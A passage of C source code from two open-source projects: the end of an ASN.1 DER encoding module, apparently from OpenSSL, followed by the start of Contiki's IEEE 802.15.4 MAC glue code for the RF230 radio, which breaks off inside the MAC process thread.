ASN1_TFLG_NDEF); } int ASN1_item_i2d(ASN1_VALUE *val, unsigned char **out, const ASN1_ITEM *it) { return asn1_item_flags_i2d(val, out, it, 0); } /* * Encode an ASN1 item, this is use by the standard 'i2d' function. 'out' * points to a buffer to output the data to. The new i2d has one additional * feature. If the output buffer is NULL (i.e. *out == NULL) then a buffer is * allocated and populated with the encoding. */ static int asn1_item_flags_i2d(ASN1_VALUE *val, unsigned char **out, const ASN1_ITEM *it, int flags) { if (out && !*out) { unsigned char *p, *buf; int len; len = ASN1_item_ex_i2d(&val, NULL, it, -1, flags); if (len <= 0) return len; if ((buf = OPENSSL_malloc(len)) == NULL) { ASN1err(ASN1_F_ASN1_ITEM_FLAGS_I2D, ERR_R_MALLOC_FAILURE); return -1; } p = buf; ASN1_item_ex_i2d(&val, &p, it, -1, flags); *out = buf; return len; } return ASN1_item_ex_i2d(&val, out, it, -1, flags); } /* * Encode an item, taking care of IMPLICIT tagging (if any). This function * performs the normal item handling: it can be used in external types. */ int ASN1_item_ex_i2d(ASN1_VALUE **pval, unsigned char **out, const ASN1_ITEM *it, int tag, int aclass) { const ASN1_TEMPLATE *tt = NULL; int i, seqcontlen, seqlen, ndef = 1; const ASN1_EXTERN_FUNCS *ef; const ASN1_AUX *aux = it->funcs; ASN1_aux_cb *asn1_cb = 0; if ((it->itype != ASN1_ITYPE_PRIMITIVE) && !*pval) return 0; if (aux && aux->asn1_cb) asn1_cb = aux->asn1_cb; switch (it->itype) { case ASN1_ITYPE_PRIMITIVE: if (it->templates) return asn1_template_ex_i2d(pval, out, it->templates, tag, aclass); return asn1_i2d_ex_primitive(pval, out, it, tag, aclass); case ASN1_ITYPE_MSTRING: return asn1_i2d_ex_primitive(pval, out, it, -1, aclass); case ASN1_ITYPE_CHOICE: if (asn1_cb && !asn1_cb(ASN1_OP_I2D_PRE, pval, it, NULL)) return 0; i = asn1_get_choice_selector(pval, it); if ((i >= 0) && (i < it->tcount)) { ASN1_VALUE **pchval; const ASN1_TEMPLATE *chtt; chtt = it->templates + i; pchval = asn1_get_field_ptr(pval, chtt); return asn1_template_ex_i2d(pchval, out, chtt, -1, aclass); } /* Fixme: error condition if selector out of range */ if (asn1_cb && !asn1_cb(ASN1_OP_I2D_POST, pval, it, NULL)) return 0; break; case ASN1_ITYPE_EXTERN: /* If new style i2d it does all the work */ ef = it->funcs; return ef->asn1_ex_i2d(pval, out, it, tag, aclass); case ASN1_ITYPE_NDEF_SEQUENCE: /* Use indefinite length constructed if requested */ if (aclass & ASN1_TFLG_NDEF) ndef = 2; /* fall through */ case ASN1_ITYPE_SEQUENCE: i = asn1_enc_restore(&seqcontlen, out, pval, it); /* An error occurred */ if (i < 0) return 0; /* We have a valid cached encoding... */ if (i > 0) return seqcontlen; /* Otherwise carry on */ seqcontlen = 0; /* If no IMPLICIT tagging set to SEQUENCE, UNIVERSAL */ if (tag == -1) { tag = V_ASN1_SEQUENCE; /* Retain any other flags in aclass */ aclass = (aclass & ~ASN1_TFLG_TAG_CLASS) | V_ASN1_UNIVERSAL; } if (asn1_cb && !asn1_cb(ASN1_OP_I2D_PRE, pval, it, NULL)) return 0; /* First work out sequence content length */ for (i = 0, tt = it->templates; i < it->tcount; tt++, i++) { const ASN1_TEMPLATE *seqtt; ASN1_VALUE **pseqval; int tmplen; seqtt = asn1_do_adb(pval, tt, 1); if (!seqtt) return 0; pseqval = asn1_get_field_ptr(pval, seqtt); tmplen = asn1_template_ex_i2d(pseqval, NULL, seqtt, -1, aclass); if (tmplen == -1 || (tmplen > INT_MAX - seqcontlen)) return -1; seqcontlen += tmplen; } seqlen = ASN1_object_size(ndef, seqcontlen, tag); if (!out || seqlen == -1) return seqlen; /* Output SEQUENCE header */ ASN1_put_object(out, ndef, seqcontlen, tag, aclass); for (i = 0, tt = it->templates; i < it->tcount; tt++, i++) { const ASN1_TEMPLATE *seqtt; ASN1_VALUE **pseqval; seqtt = asn1_do_adb(pval, tt, 1); if (!seqtt) return 0; pseqval = asn1_get_field_ptr(pval, seqtt); /* FIXME: check for errors in enhanced version */ asn1_template_ex_i2d(pseqval, out, seqtt, -1, aclass); } if (ndef == 2) ASN1_put_eoc(out); if (asn1_cb && !asn1_cb(ASN1_OP_I2D_POST, pval, it, NULL)) return 0; return seqlen; default: return 0; } return 0; } static int asn1_template_ex_i2d(ASN1_VALUE **pval, unsigned char **out, const ASN1_TEMPLATE *tt, int tag, int iclass) { int i, ret, flags, ttag, tclass, ndef; ASN1_VALUE *tval; flags = tt->flags; /* * If field is embedded then val needs fixing so it is a pointer to * a pointer to a field. */ if (flags & ASN1_TFLG_EMBED) { tval = (ASN1_VALUE *)pval; pval = &tval; } /* * Work out tag and class to use: tagging may come either from the * template or the arguments, not both because this would create * ambiguity. Additionally the iclass argument may contain some * additional flags which should be noted and passed down to other * levels. */ if (flags & ASN1_TFLG_TAG_MASK) { /* Error if argument and template tagging */ if (tag != -1) /* FIXME: error code here */ return -1; /* Get tagging from template */ ttag = tt->tag; tclass = flags & ASN1_TFLG_TAG_CLASS; } else if (tag != -1) { /* No template tagging, get from arguments */ ttag = tag; tclass = iclass & ASN1_TFLG_TAG_CLASS; } else { ttag = -1; tclass = 0; } /* * Remove any class mask from iflag. */ iclass &= ~ASN1_TFLG_TAG_CLASS; /* * At this point 'ttag' contains the outer tag to use, 'tclass' is the * class and iclass is any flags passed to this function. */ /* if template and arguments require ndef, use it */ if ((flags & ASN1_TFLG_NDEF) && (iclass & ASN1_TFLG_NDEF)) ndef = 2; else ndef = 1; if (flags & ASN1_TFLG_SK_MASK) { /* SET OF, SEQUENCE OF */ STACK_OF(ASN1_VALUE) *sk = (STACK_OF(ASN1_VALUE) *)*pval; int isset, sktag, skaclass; int skcontlen, sklen; ASN1_VALUE *skitem; if (!*pval) return 0; if (flags & ASN1_TFLG_SET_OF) { isset = 1; /* 2 means we reorder */ if (flags & ASN1_TFLG_SEQUENCE_OF) isset = 2; } else isset = 0; /* * Work out inner tag value: if EXPLICIT or no tagging use underlying * type. */ if ((ttag != -1) && !(flags & ASN1_TFLG_EXPTAG)) { sktag = ttag; skaclass = tclass; } else { skaclass = V_ASN1_UNIVERSAL; if (isset) sktag = V_ASN1_SET; else sktag = V_ASN1_SEQUENCE; } /* Determine total length of items */ skcontlen = 0; for (i = 0; i < sk_ASN1_VALUE_num(sk); i++) { int tmplen; skitem = sk_ASN1_VALUE_value(sk, i); tmplen = ASN1_item_ex_i2d(&skitem, NULL, ASN1_ITEM_ptr(tt->item), -1, iclass); if (tmplen == -1 || (skcontlen > INT_MAX - tmplen)) return -1; skcontlen += tmplen; } sklen = ASN1_object_size(ndef, skcontlen, sktag); if (sklen == -1) return -1; /* If EXPLICIT need length of surrounding tag */ if (flags & ASN1_TFLG_EXPTAG) ret = ASN1_object_size(ndef, sklen, ttag); else ret = sklen; if (!out || ret == -1) return ret; /* Now encode this lot... */ /* EXPLICIT tag */ if (flags & ASN1_TFLG_EXPTAG) ASN1_put_object(out, ndef, sklen, ttag, tclass); /* SET or SEQUENCE and IMPLICIT tag */ ASN1_put_object(out, ndef, skcontlen, sktag, skaclass); /* And the stuff itself */ asn1_set_seq_out(sk, out, skcontlen, ASN1_ITEM_ptr(tt->item), isset, iclass); if (ndef == 2) { ASN1_put_eoc(out); if (flags & ASN1_TFLG_EXPTAG) ASN1_put_eoc(out); } return ret; } if (flags & ASN1_TFLG_EXPTAG) { /* EXPLICIT tagging */ /* Find length of tagged item */ i = ASN1_item_ex_i2d(pval, NULL, ASN1_ITEM_ptr(tt->item), -1, iclass); if (!i) return 0; /* Find length of EXPLICIT tag */ ret = ASN1_object_size(ndef, i, ttag); if (out && ret != -1) { /* Output tag and item */ ASN1_put_object(out, ndef, i, ttag, tclass); ASN1_item_ex_i2d(pval, out, ASN1_ITEM_ptr(tt->item), -1, iclass); if (ndef == 2) ASN1_put_eoc(out); } return ret; } /* Either normal or IMPLICIT tagging: combine class and flags */ return ASN1_item_ex_i2d(pval, out, ASN1_ITEM_ptr(tt->item), ttag, tclass | iclass); } /* Temporary structure used to hold DER encoding of items for SET OF */ typedef struct { unsigned char *data; int length; ASN1_VALUE *field; } DER_ENC; static int der_cmp(const void *a, const void *b) { const DER_ENC *d1 = a, *d2 = b; int cmplen, i; cmplen = (d1->length < d2->length) ? d1->length : d2->length; i = memcmp(d1->data, d2->data, cmplen); if (i) return i; return d1->length - d2->length; } /* Output the content octets of SET OF or SEQUENCE OF */ static int asn1_set_seq_out(STACK_OF(ASN1_VALUE) *sk, unsigned char **out, int skcontlen, const ASN1_ITEM *item, int do_sort, int iclass) { int i; ASN1_VALUE *skitem; unsigned char *tmpdat = NULL, *p = NULL; DER_ENC *derlst = NULL, *tder; if (do_sort) { /* Don't need to sort less than 2 items */ if (sk_ASN1_VALUE_num(sk) < 2) do_sort = 0; else { derlst = OPENSSL_malloc(sk_ASN1_VALUE_num(sk) * sizeof(*derlst)); if (derlst == NULL) return 0; tmpdat = OPENSSL_malloc(skcontlen); if (tmpdat == NULL) { OPENSSL_free(derlst); return 0; } } } /* If not sorting just output each item */ if (!do_sort) { for (i = 0; i < sk_ASN1_VALUE_num(sk); i++) { skitem = sk_ASN1_VALUE_value(sk, i); ASN1_item_ex_i2d(&skitem, out, item, -1, iclass); } return 1; } p = tmpdat; /* Doing sort: build up a list of each member's DER encoding */ for (i = 0, tder = derlst; i < sk_ASN1_VALUE_num(sk); i++, tder++) { skitem = sk_ASN1_VALUE_value(sk, i); tder->data = p; tder->length = ASN1_item_ex_i2d(&skitem, &p, item, -1, iclass); tder->field = skitem; } /* Now sort them */ qsort(derlst, sk_ASN1_VALUE_num(sk), sizeof(*derlst), der_cmp); /* Output sorted DER encoding */ p = *out; for (i = 0, tder = derlst; i < sk_ASN1_VALUE_num(sk); i++, tder++) { memcpy(p, tder->data, tder->length); p += tder->length; } *out = p; /* If do_sort is 2 then reorder the STACK */ if (do_sort == 2) { for (i = 0, tder = derlst; i < sk_ASN1_VALUE_num(sk); i++, tder++) (void)sk_ASN1_VALUE_set(sk, i, tder->field); } OPENSSL_free(derlst); OPENSSL_free(tmpdat); return 1; } static int asn1_i2d_ex_primitive(ASN1_VALUE **pval, unsigned char **out, const ASN1_ITEM *it, int tag, int aclass) { int len; int utype; int usetag; int ndef = 0; utype = it->utype; /* * Get length of content octets and maybe find out the underlying type. */ len = asn1_ex_i2c(pval, NULL, &utype, it); /* * If SEQUENCE, SET or OTHER then header is included in pseudo content * octets so don't include tag+length. We need to check here because the * call to asn1_ex_i2c() could change utype. */ if ((utype == V_ASN1_SEQUENCE) || (utype == V_ASN1_SET) || (utype == V_ASN1_OTHER)) usetag = 0; else usetag = 1; /* -1 means omit type */ if (len == -1) return 0; /* -2 return is special meaning use ndef */ if (len == -2) { ndef = 2; len = 0; } /* If not implicitly tagged get tag from underlying type */ if (tag == -1) tag = utype; /* Output tag+length followed by content octets */ if (out) { if (usetag) ASN1_put_object(out, ndef, len, tag, aclass); asn1_ex_i2c(pval, *out, &utype, it); if (ndef) ASN1_put_eoc(out); else *out += len; } if (usetag) return ASN1_object_size(ndef, len, tag); return len; } /* Produce content octets from a structure */ static int asn1_ex_i2c(ASN1_VALUE **pval, unsigned char *cout, int *putype, const ASN1_ITEM *it) { ASN1_BOOLEAN *tbool = NULL; ASN1_STRING *strtmp; ASN1_OBJECT *otmp; int utype; const unsigned char *cont; unsigned char c; int len; const ASN1_PRIMITIVE_FUNCS *pf; pf = it->funcs; if (pf && pf->prim_i2c) return pf->prim_i2c(pval, cout, putype, it); /* Should type be omitted? */ if ((it->itype != ASN1_ITYPE_PRIMITIVE) || (it->utype != V_ASN1_BOOLEAN)) { if (!*pval) return -1; } if (it->itype == ASN1_ITYPE_MSTRING) { /* If MSTRING type set the underlying type */ strtmp = (ASN1_STRING *)*pval; utype = strtmp->type; *putype = utype; } else if (it->utype == V_ASN1_ANY) { /* If ANY set type and pointer to value */ ASN1_TYPE *typ; typ = (ASN1_TYPE *)*pval; utype = typ->type; *putype = utype; pval = &typ->value.asn1_value; } else utype = *putype; switch (utype) { case V_ASN1_OBJECT: otmp = (ASN1_OBJECT *)*pval; cont = otmp->data; len = otmp->length; if (cont == NULL || len == 0) return -1; break; case V_ASN1_NULL: cont = NULL; len = 0; break; case V_ASN1_BOOLEAN: tbool = (ASN1_BOOLEAN *)pval; if (*tbool == -1) return -1; if (it->utype != V_ASN1_ANY) { /* * Default handling if value == size field then omit */ if (*tbool && (it->size > 0)) return -1; if (!*tbool && !it->size) return -1; } c = (unsigned char)*tbool; cont = &c; len = 1; break; case V_ASN1_BIT_STRING: return i2c_ASN1_BIT_STRING((ASN1_BIT_STRING *)*pval, cout ? &cout : NULL); case V_ASN1_INTEGER: case V_ASN1_ENUMERATED: /* * These are all have the same content format as ASN1_INTEGER */ return i2c_ASN1_INTEGER((ASN1_INTEGER *)*pval, cout ? &cout : NULL); case V_ASN1_OCTET_STRING: case V_ASN1_NUMERICSTRING: case V_ASN1_PRINTABLESTRING: case V_ASN1_T61STRING: case V_ASN1_VIDEOTEXSTRING: case V_ASN1_IA5STRING: case V_ASN1_UTCTIME: case V_ASN1_GENERALIZEDTIME: case V_ASN1_GRAPHICSTRING: case V_ASN1_VISIBLESTRING: case V_ASN1_GENERALSTRING: case V_ASN1_UNIVERSALSTRING: case V_ASN1_BMPSTRING: case V_ASN1_UTF8STRING: case V_ASN1_SEQUENCE: case V_ASN1_SET: default: /* All based on ASN1_STRING and handled the same */ strtmp = (ASN1_STRING *)*pval; /* Special handling for NDEF */ if ((it->size == ASN1_TFLG_NDEF) && (strtmp->flags & ASN1_STRING_FLAG_NDEF)) { if (cout) { strtmp->data = cout; strtmp->length = 0; } /* Special return code */ return -2; } cont = strtmp->data; len = strtmp->length; break; } if (cout && len) memcpy(cout, cont, len); return len; }
{ "language": "C" }
/* * Copyright (c) 2008, Swedish Institute of Computer Science. * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. Neither the name of the Institute nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE INSTITUTE AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE INSTITUTE OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * This file is part of the Contiki operating system. * */ /** * \file * Example glue code between the existing MAC code and the * Contiki mac interface * * \author * Adam Dunkels <adam@sics.se> * Eric Gnoske <egnoske@gmail.com> * Blake Leverett <bleverett@gmail.com> * * \addtogroup rf230mac */ #include <stdlib.h> #include <stdbool.h> #include <string.h> #include <stdio.h> #include <avr/eeprom.h> #include <util/delay.h> #include "net/packetbuf.h" #include "zmac.h" #include "mac.h" #include "frame.h" #include "radio.h" #include "tcpip.h" #include "sicslowmac.h" #include "sicslowpan.h" #include "ieee-15-4-manager.h" /* Macros */ #define DEBUG 0 #define MAX_EVENTS 10 #if DEBUG #define PRINTF(...) printf(__VA_ARGS__) #define SICSLOW_CORRECTION_DELAY 70 #else #define PRINTF(...) #define SICSLOW_CORRECTION_DELAY 7 #endif #ifdef JACKDAW #include "sicslow_ethernet.h" #define LOG_FRAME(x,y) mac_logTXtoEthernet(x,y) #else #define LOG_FRAME(x,y) #endif /* Globals */ static struct mac_driver mac_driver_struct; static struct mac_driver *pmac_driver = &mac_driver_struct; extern ieee_15_4_manager_t ieee15_4ManagerAddress; static parsed_frame_t *parsed_frame; /* The core mac layer has a pointer to the driver name in the first field. * It calls the radio driver with radio->send, which is the first field of the radio driver. * This glue directs radio->send to the custom mac layer. */ const struct mac_driver sicslowmac_driver = { (char *)sicslowmac_dataRequest, //Remove compiler warning. /* read_packet, */ /* set_receive_function, */ /* on, */ /* off, */ }; static struct { uint8_t head; uint8_t tail; event_object_t event_object[MAX_EVENTS]; } event_queue; /* Prototypes */ static void setinput(void (*r)(const struct mac_driver *d)); void (*pinput)(const struct mac_driver *r); void sicslowmac_unknownIndication(void); void (*sicslowmac_snifferhook)(const struct mac_driver *r) = NULL; /*---------------------------------------------------------------------------*/ /** * \brief Checks for any pending events in the queue. * * \return True if there is a pending event, else false. */ uint8_t mac_event_pending(void) { return (event_queue.head != event_queue.tail); } /*---------------------------------------------------------------------------*/ /** * \brief Puts an event into the queue of events. * * \param object is a pointer to the event to add to queue. */ void mac_put_event(event_object_t *object) { uint8_t newhead; if ((event_queue.head + 1) % MAX_EVENTS == event_queue.tail){ /* queue full, get outta here */ return; } newhead = event_queue.head; /* store in queue */ event_queue.event_object[newhead] = *object; /* calculate new head index */ newhead++; if (newhead >= MAX_EVENTS){ newhead = 0; } event_queue.head = newhead; } /*---------------------------------------------------------------------------*/ /** * \brief Pulls an event from the event queue. * Assumes that there is an event in the queue. See mac_event_pending(). * * \return Pointer to the event object, or NULL in the event of empty queue. */ event_object_t *mac_get_event(void) { event_object_t *object = NULL; volatile uint8_t newtail; newtail = event_queue.tail; object = &(event_queue.event_object[newtail]); /* calculate new tail */ newtail++; if (newtail >= MAX_EVENTS){ newtail = 0; } event_queue.tail = newtail; return(object); } void mac_pollhandler(void) { mac_task(0, NULL); } /*---------------------------------------------------------------------------*/ /** * \brief This is the main loop task for the MAC. Called by the * main application loop. */ void mac_task(process_event_t ev, process_data_t data) { /* check for event in queue */ event_object_t *event; if(mac_event_pending()){ event = mac_get_event(); /* Handle events from radio */ if (event){ if (event->event == MAC_EVENT_RX){ /* got a frame, find out with kind of frame */ parsed_frame = (parsed_frame_t *)event->data; if (parsed_frame->fcf->frameType == DATAFRAME){ sicslowmac_dataIndication(); } else { /* Hook to cath unknown frames */ sicslowmac_unknownIndication(); } /* Frame no longer in use */ parsed_frame->in_use = false; } if (event->event == MAC_EVENT_DROPPED){ /* Frame was dropped */ PRINTF("sicslowmac: Frame Dropped!\n"); } } } } /*---------------------------------------------------------------------------*/ void setinput(void (*r)(const struct mac_driver *d)) { pinput = r; } /*---------------------------------------------------------------------------*/ static uint8_t dest_reversed[UIP_LLADDR_LEN]; static uint8_t src_reversed[UIP_LLADDR_LEN]; # define MSB(u16) (((uint8_t* )&u16)[1]) # define LSB(u16) (((uint8_t* )&u16)[0]) void sicslowmac_dataIndication(void) { packetbuf_clear(); #if UIP_LLADDR_LEN == 8 /* Finally, get the stuff into the rime buffer.... */ packetbuf_copyfrom(parsed_frame->payload, parsed_frame->payload_length); packetbuf_set_datalen(parsed_frame->payload_length); memcpy(dest_reversed, (uint8_t *)parsed_frame->dest_addr, UIP_LLADDR_LEN); memcpy(src_reversed, (uint8_t *)parsed_frame->src_addr, UIP_LLADDR_LEN); /* Change addresses to expected byte order */ byte_reverse((uint8_t *)dest_reversed, UIP_LLADDR_LEN); byte_reverse((uint8_t *)src_reversed, UIP_LLADDR_LEN); packetbuf_set_addr(PACKETBUF_ADDR_RECEIVER, (const linkaddr_t *)dest_reversed); packetbuf_set_addr(PACKETBUF_ADDR_SENDER, (const linkaddr_t *)src_reversed); #elif UIP_CONF_USE_RUM /* Finally, get the stuff into the rime buffer.... */ packetbuf_copyfrom(parsed_frame->payload + UIP_DATA_RUM_OFFSET, parsed_frame->payload_length - UIP_DATA_RUM_OFFSET); packetbuf_set_datalen(parsed_frame->payload_length + UIP_DATA_RUM_OFFSET); dest_reversed[0] = MSB(parsed_frame->dest_pid); dest_reversed[1] = LSB(parsed_frame->dest_pid); dest_reversed[2] = 0; dest_reversed[3] = 0; dest_reversed[4] = MSB(parsed_frame->payload[0]); //FinalDestAddr dest_reversed[5] = LSB(parsed_frame->payload[1]); src_reversed[0] = MSB(parsed_frame->src_pid); src_reversed[1] = LSB(parsed_frame->src_pid); src_reversed[2] = 0; src_reversed[3] = 0; src_reversed[4] = MSB(parsed_frame->payload[2]); //originAddr src_reversed[5] = LSB(parsed_frame->payload[3]); #else /* Finally, get the stuff into the rime buffer.... */ packetbuf_copyfrom(parsed_frame->payload, parsed_frame->payload_length); packetbuf_set_datalen(parsed_frame->payload_length); dest_reversed[0] = MSB(parsed_frame->dest_pid); dest_reversed[1] = LSB(parsed_frame->dest_pid); dest_reversed[2] = 0; dest_reversed[3] = 0; dest_reversed[4] = MSB(parsed_frame->dest_addr->addr16); dest_reversed[5] = LSB(parsed_frame->dest_addr->addr16); src_reversed[0] = MSB(parsed_frame->src_pid); src_reversed[1] = LSB(parsed_frame->src_pid); src_reversed[2] = 0; src_reversed[3] = 0; src_reversed[4] = MSB(parsed_frame->src_addr->addr16); src_reversed[5] = LSB(parsed_frame->src_addr->addr16); packetbuf_set_addr(PACKETBUF_ADDR_RECEIVER, (const linkaddr_t *)dest_reversed); packetbuf_set_addr(PACKETBUF_ADDR_SENDER, (const linkaddr_t *)src_reversed); #endif PRINTF("sicslowmac: hand off frame to sicslowpan \n"); pinput(pmac_driver); } void sicslowmac_unknownIndication(void) { if (sicslowmac_snifferhook) { packetbuf_clear(); /* Finally, get the stuff into the rime buffer.... */ packetbuf_copyfrom(parsed_frame->payload, parsed_frame->payload_length); packetbuf_set_datalen(parsed_frame->payload_length); #if UIP_LLADDR_LEN == 8 memcpy(dest_reversed, (uint8_t *)parsed_frame->dest_addr, UIP_LLADDR_LEN); memcpy(src_reversed, (uint8_t *)parsed_frame->src_addr, UIP_LLADDR_LEN); /* Change addresses to expected byte order */ byte_reverse((uint8_t *)dest_reversed, UIP_LLADDR_LEN); byte_reverse((uint8_t *)src_reversed, UIP_LLADDR_LEN); packetbuf_set_addr(PACKETBUF_ADDR_RECEIVER, (const linkaddr_t *)dest_reversed); packetbuf_set_addr(PACKETBUF_ADDR_SENDER, (const linkaddr_t *)src_reversed); #elif UIP_CONF_USE_RUM dest_reversed[0] = MSB(parsed_frame->dest_pid); dest_reversed[1] = LSB(parsed_frame->dest_pid); dest_reversed[2] = 0; dest_reversed[3] = 0; dest_reversed[4] = MSB(parsed_frame->payload[0]); //FinalDestAddr dest_reversed[5] = LSB(parsed_frame->payload[1]); src_reversed[0] = MSB(parsed_frame->src_pid); src_reversed[1] = LSB(parsed_frame->src_pid); src_reversed[2] = 0; src_reversed[3] = 0; src_reversed[4] = MSB(parsed_frame->payload[2]); //originAddr src_reversed[5] = LSB(parsed_frame->payload[3]); #else dest_reversed[0] = MSB(parsed_frame->dest_pid); dest_reversed[1] = LSB(parsed_frame->dest_pid); dest_reversed[2] = 0; dest_reversed[3] = 0; dest_reversed[4] = MSB(parsed_frame->dest_addr->addr16); dest_reversed[5] = LSB(parsed_frame->dest_addr->addr16); src_reversed[0] = MSB(parsed_frame->src_pid); src_reversed[1] = LSB(parsed_frame->src_pid); src_reversed[2] = 0; src_reversed[3] = 0; src_reversed[4] = MSB(parsed_frame->src_addr->addr16); src_reversed[5] = LSB(parsed_frame->src_addr->addr16); packetbuf_set_addr(PACKETBUF_ADDR_RECEIVER, (const linkaddr_t *)dest_reversed); packetbuf_set_addr(PACKETBUF_ADDR_SENDER, (const linkaddr_t *)src_reversed); #endif PRINTF("sicslowmac: hand off frame to sniffer \n"); sicslowmac_snifferhook(pmac_driver); } } /*---------------------------------------------------------------------------*/ /** * \brief This is the implementation of the 15.4 MAC Data Request * primitive. * * \return Integer denoting success or failure. * \retval 0 Failure. * \retval 1 Success. * * The data request primitive creates the frame header based * on static and dynamic data. The static data will be refined * in phase II of the project. The frame payload and length are * retrieved from the rime buffer and rime length respectively. * * When the header and payload are assembled into the * frame_create_params structure, the frame is created * by a call to frame_tx_create and then transmited via * radio_send_data. */ /*---------------------------------------------------------------------------*/ int sicslowmac_dataRequest(void) { _delay_ms(SICSLOW_CORRECTION_DELAY); /* create structure to store result. */ frame_create_params_t params; frame_result_t result; #if NETSTACK_CONF_WITH_RIME /* Save the msduHandle in a global variable. */ msduHandle = packetbuf_attr(PACKETBUF_ATTR_PACKET_ID); #endif /* Build the FCF. */ params.fcf.frameType = DATAFRAME; params.fcf.securityEnabled = false; params.fcf.framePending = false; #if NETSTACK_CONF_WITH_RIME params.fcf.ackRequired = packetbuf_attr(PACKETBUF_ATTR_RELIABLE); #endif params.fcf.panIdCompression = false; /* Insert IEEE 802.15.4 (2003) version bit. */ params.fcf.frameVersion = IEEE802154_2003; /* Increment and set the data sequence number. */ params.seq = macDSN++; /* Complete the addressing fields. */ /** \todo For phase 1 the addresses are all long. We'll need a mechanism in the rime attributes to tell the mac to use long or short for phase 2. */ params.fcf.srcAddrMode = LONGADDRMODE; params.dest_pid = ieee15_4ManagerAddress.get_dst_panid(); if(packetbuf_holds_broadcast()) { /* Broadcast requires short address mode. */ params.fcf.destAddrMode = SHORTADDRMODE; params.dest_pid = BROADCASTPANDID; params.dest_addr.addr16 = BROADCASTADDR; } else { /* Phase 1.5 - end nodes send to anyone? */ memcpy(&params.dest_addr, (uint8_t *)packetbuf_addr(PACKETBUF_ADDR_RECEIVER), LONG_ADDR_LEN); /* Change from sicslowpan byte arrangement to sicslowmac */ byte_reverse((uint8_t*)&params.dest_addr.addr64, LONG_ADDR_LEN); /* Phase 1 - end nodes only sends to pan coordinator node. */ /* params.dest_addr.addr64 = ieee15_4ManagerAddress.get_coord_long_addr(); */ params.fcf.destAddrMode = LONGADDRMODE; } /* Set the source PAN ID to the global variable. */ params.src_pid = ieee15_4ManagerAddress.get_src_panid(); /* * Set up the source address using only the long address mode for * phase 1. */ params.src_addr.addr64 = ieee15_4ManagerAddress.get_long_addr(); /* Copy the payload data. */ params.payload_len = packetbuf_datalen(); params.payload = packetbuf_dataptr(); /* Create transmission frame. */ frame_tx_create(&params, &result); /* Log if needed */ LOG_FRAME(&params, &result); /* Retry up to this many times to send the packet if radio is busy */ uint8_t retry_count = 3; while(retry_count) { PRINTF("sicslowmac: sending packet of length %d to radio, result:", result.length); /* Send data to radio. */ radio_status_t rv = radio_send_data(result.length, result.frame); if (rv == RADIO_SUCCESS) { PRINTF(" Success\n"); return 1; /* True says that the packet could be sent */ } if (rv != RADIO_WRONG_STATE) { PRINTF(" Failed\n"); return 0; } PRINTF(" Radio busy, retrying\n"); /** \todo: Fix delay in sicslowmac so they do not block receiving */ //We have blocking delay here, it is safest this way. BUT doesn't solve the //problem of TX when you are RXing.. as the RX code can't execute! if (retry_count == 3) { _delay_ms(10); } else if (retry_count == 2) { _delay_ms(50); } else if (retry_count == 1) { _delay_ms(200); } retry_count--; } PRINTF("sicslowmac: Unable to send packet, dropped\n"); return 0; } /*---------------------------------------------------------------------------*/ /** * \brief Stub function that will be implemented in phase 2 to cause * end nodes to sleep. */ int mac_wake(void) { return 1; } /*---------------------------------------------------------------------------*/ /** * \brief Stub function that will be implemented in phase 2 to cause * end nodes to sleep. */ int mac_sleep(void) { return 1; } /*---------------------------------------------------------------------------*/ const struct mac_driver * sicslowmac_init(const struct radio_driver *d) { /* AD: commented out the radio_driver code for now.*/ /* radio = d; radio->set_receive_function(input_packet); radio->on();*/ return &sicslowmac_driver; } /*---------------------------------------------------------------------------*/ /** * \brief This is the implementation of the 15.4 MAC Reset Request * primitive. * \param setDefaultPIB True if the default PIB values should be set. * \return Integer denoting success or failure. * \retval 0 Failure. * \retval 1 Success. * * Sets all PIB values to default. */ void sicslowmac_resetRequest (bool setDefaultPIB) { if(setDefaultPIB){ /* initialize all of the MAC PIB variables to their default values */ macCoordShortAddress = 0xffff; macDSN = rand() % 256; macSrcPANId = SOURCE_PAN_ID; macDstPANId = DEST_PAN_ID; macShortAddress = 0xffff; /* Setup the address of this device by reading a stored address from eeprom. */ /** \todo This might be read from the serial eeprom onboard Raven. */ AVR_ENTER_CRITICAL_REGION(); eeprom_read_block ((void *)&macLongAddr, EEPROMMACADDRESS, 8); byte_reverse((uint8_t *) &macLongAddr, 8); AVR_LEAVE_CRITICAL_REGION(); } } parsed_frame_t * sicslowmac_get_frame(void) { return parsed_frame; } /*---------------------------------------------------------------------------*/ struct mac_driver * sicslowmac_get_driver(void) { return pmac_driver; } /*---------------------------------------------------------------------------*/ PROCESS(mac_process, "802.15.4 MAC process"); PROCESS_THREAD(mac_process, ev, data) { PROCESS_POLLHANDLER(mac_pollhandler()); PROCESS_BEGIN(); radio_status_t return_value; /* init radio */ /** \todo: this screws up if calosc is set to TRUE, find out why? */ return_value = radio_init(false, NULL, NULL, NULL); #if DEBUG if (return_value == RADIO_SUCCESS) { printf("Radio init successful.\n"); } else { printf("Radio init failed with return: %d\n", return_value); } #endif uint8_t eeprom_channel; uint8_t eeprom_check; eeprom_channel = eeprom_read_byte((uint8_t *)9); eeprom_check = eeprom_read_byte((uint8_t *)10); if ((eeprom_channel < 11) || (eeprom_channel > 26) || ((uint8_t)eeprom_channel != (uint8_t)~eeprom_check)) { #if UIP_CONF_USE_RUM eeprom_channel = 19; //Default #else eeprom_channel = 24; //Default #endif } 